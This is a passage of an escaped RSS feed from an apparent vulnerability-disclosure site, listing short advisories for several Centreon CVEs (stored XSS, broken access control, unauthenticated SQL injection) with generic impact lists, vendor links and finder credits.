&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Hosts configuration parameters page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12519</title>
        <link>https://www.cvehunters.com/p/cve-2025-12519/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-12519/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12519-broken-access-control&amp;#34;&amp;gt;CVE-2025-12519: Broken Access Control
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Information disclosure on Administration parameters API endpoint.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12519-broken-access-control&amp;#34;&amp;gt;CVE-2025-12519: Broken Access Control
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Information disclosure on Administration parameters API endpoint.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-13056</title>
        <link>https://www.cvehunters.com/p/cve-2025-13056/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-13056/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-13056-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-13056: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Administration ACL Menus configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-13056-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-13056: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Administration ACL Menus configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-15026</title>
        <link>https://www.cvehunters.com/p/cve-2025-15026/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-15026/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-15026-broken-access-control&amp;#34;&amp;gt;CVE-2025-15026: Broken Access Control
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Missing Authentication for Critical Function vulnerability in Centreon Infra Monitoring centreon-awie (Awie import module) allows Accessing Functionality Not Properly Constrained by ACLs.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-15026-broken-access-control&amp;#34;&amp;gt;CVE-2025-15026: Broken Access Control
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Missing Authentication for Critical Function vulnerability in Centreon Infra Monitoring centreon-awie (Awie import module) allows Accessing Functionality Not Properly Constrained by ACLs.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-15029</title>
        <link>https://www.cvehunters.com/p/cve-2025-15029/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-15029/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-15029-sql-injection&amp;#34;&amp;gt;CVE-2025-15029: SQL Injection
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An unauthenticated user is able to introduce SQL Injection using the AWIE export module.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-15029-sql-injection&amp;#34;&amp;gt;CVE-2025-15029: SQL Injection
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An unauthenticated user is able to introduce SQL Injection using the AWIE export module.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
